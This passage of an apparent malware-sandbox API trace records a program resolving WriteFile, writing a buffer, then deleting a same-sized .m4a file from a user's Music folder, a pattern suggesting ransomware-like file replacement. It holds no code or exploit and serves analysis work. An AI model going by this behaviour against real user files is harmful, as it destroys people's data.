(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0184.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0184.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0184.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0184.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0184.377] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0184.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0184.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0184.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0184.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0184.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0184.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0184.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0184.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0184.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0184.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0184.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.380] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0184.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0184.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9ba618 [0184.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba618, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0184.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.381] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0184.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0184.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0184.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0184.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0184.381] WriteFile (in: hFile=0x138, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0x64c5, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0x64c5, lpOverlapped=0x0) returned 1 [0184.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0184.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0184.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0184.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0184.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0184.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0184.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0184.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0184.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0184.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0184.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0184.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0184.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0184.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0184.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0184.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0184.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0184.384] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0184.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0184.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0184.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0184.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.385] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0184.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0184.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0184.385] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0184.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.386] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0184.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.386] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0184.386] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0184.386] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0184.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0184.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0184.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0184.386] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.386] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.388] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.388] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.388] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.388] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.388] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a", lpFilePart=0x0) returned 0x5e [0184.390] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x822c4ab0, ftCreationTime.dwHighDateTime=0x1d5dcc0, ftLastAccessTime.dwLowDateTime=0x45537f10, ftLastAccessTime.dwHighDateTime=0x1d5e179, ftLastWriteTime.dwLowDateTime=0x13269340, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x64c5, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="K4cO 93Mbgwb3udHm.m4a", cAlternateFileName="K4CO93~1.M4A")) returned 0x90ae18 [0184.391] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\k4co 93mbgwb3udhm.m4a")) returned 1 [0184.397] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x822c4ab0, ftCreationTime.dwHighDateTime=0x1d5dcc0, ftLastAccessTime.dwLowDateTime=0x45537f10, ftLastAccessTime.dwHighDateTime=0x1d5e179, ftLastWriteTime.dwLowDateTime=0x13269340, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x64c5, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="K4cO 93Mbgwb3udHm.m4a", cAlternateFileName="K4CO93~1.M4A")) returned 0 [0184.397] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0184.397] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.398] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.398] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0184.398] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0184.398] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.398] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.399] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.399] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.399] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0184.400] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.400] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0184.400] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.400] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0184.401] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0184.401] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x20f7, lpOverlapped=0x0) returned 1 [0184.402] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0184.402] SetFilePointerEx (in: 